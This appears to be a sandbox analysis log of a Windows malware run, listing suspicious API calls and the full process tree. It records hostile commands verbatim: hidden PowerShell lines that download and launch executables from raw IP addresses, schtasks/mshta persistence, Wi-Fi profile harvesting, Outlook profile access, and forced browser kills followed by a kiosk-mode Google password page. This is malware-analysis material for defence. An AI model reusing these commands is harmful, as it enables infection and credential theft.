N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4392 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 4392 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 4392 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 3816 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3816 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3816 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4176 wrote to memory of 4004 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 4004 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4176 wrote to memory of 4004 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4004 wrote to memory of 3316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 4004 wrote to memory of 3316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 4004 wrote to memory of 3316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 3316 wrote to memory of 5412 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3316 wrote to memory of 5412 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3316 wrote to memory of 5412 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5412 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 5412 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 5412 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 2432 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2432 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2432 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 4412 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 4412 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 4412 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 3648 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3648 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3648 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3648 wrote to memory of 380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3648 wrote to memory of 380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3648 wrote to memory of 380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3648 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3648 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3648 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4412 wrote to memory of 5716 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 4412 wrote to memory of 5716 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 4412 wrote to memory of 5716 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 5716 wrote to memory of 5424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5716 wrote to memory of 5424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5716 wrote to memory of 5424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5716 wrote to memory of 4020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5716 wrote to memory of 4020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5716 wrote to memory of 4020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5412 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe
PID 5412 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe
PID 5412 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe
PID 3836 wrote to memory of 5708 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 5708 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 5708 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe C:\Windows\SysWOW64\mshta.exe
PID 3836 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe C:\Windows\SysWOW64\mshta.exe
PID 3836 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe C:\Windows\SysWOW64\mshta.exe
PID 5708 wrote to memory of 4176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5708 wrote to memory of 4176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5708 wrote to memory of 4176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4560 wrote to memory of 3924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4560 wrote to memory of 3924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4560 wrote to memory of 3924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5412 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn TtUPWma8i2b /tr "mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn TtUPWma8i2b /tr "mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE

"C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"

C:\Users\Admin\AppData\Local\Temp\Build.exe

"C:\Users\Admin\AppData\Local\Temp\Build.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4412 -ip 4412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 2444

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 3ZH31ma8PTZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 3ZH31ma8PTZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE

"C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "JopyNmaOIUL" /tr "mshta \"C:\Temp\CvQR3Yfqh.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\CvQR3Yfqh.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe

"C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5848 -ip 5848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 808

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe

"C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe"

C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe

"C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe

"C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe"

C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe

"C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe"

C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe

"C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe"

C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe

"C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

